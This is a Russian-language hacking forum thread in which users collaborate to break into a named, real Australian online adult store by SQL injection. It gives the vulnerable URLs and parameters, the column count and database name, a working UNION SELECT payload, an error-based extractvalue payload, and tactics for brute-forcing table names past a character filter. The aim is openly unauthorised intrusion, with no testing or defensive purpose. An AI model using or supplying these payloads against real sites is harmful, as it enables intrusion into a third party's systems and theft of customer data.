Всем привет! Никак не могу расковырять автралийский сексшоп)) с такой вот скулей: Code: http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=1' Вручную испробовал уже все известные и неизвестные мне методы. Плюс, как я понял, там вообще нет information_shema. Все, что определил, так это количество полей - 6 и название DB - discr_data. Всякие Havij и sqlmap ничего не дали. Плюс здесь вроде HPP Code: http://www.discretionadultstore.com.au/dvds-c-37.html?pto=20&pto=_BLA_BLA_BLA_&pfrom=0&page=2&ppp=60&n958468=v913722 , где pto= - уязвимый параметр (по последнему значению) В оригинале было вроде что-то типа: Code: .../dvds-c-37%26n958468%3Dv913722.html?..... Тоже ноги не смог приделать)) Кто поможет справится?
Code: http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=-1+union+select+version(),12222,311111,411111,511111,611111-- - атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?
Проблема в считывании названий таблиц, как я понял. Error based так то тоже выводит http://www.discretionadultstore.com...tValue(1,concat(0x3a,(select(version())))))=1
Понял. Судя по всему url парситься гдет внутри по символу "_" так что его использовать нельзя, значит нужно брутить таблицы на имена, не содержащие в себе "_" и молиться, чтоб и имена полей(их тоже брутить) тоже не содержали этот символ
дык это понятно, но мало что дает. Сложность именно в Если только брутить, то это грустно... прогнал на часто встречающиеся имена (штук 500), все мимо.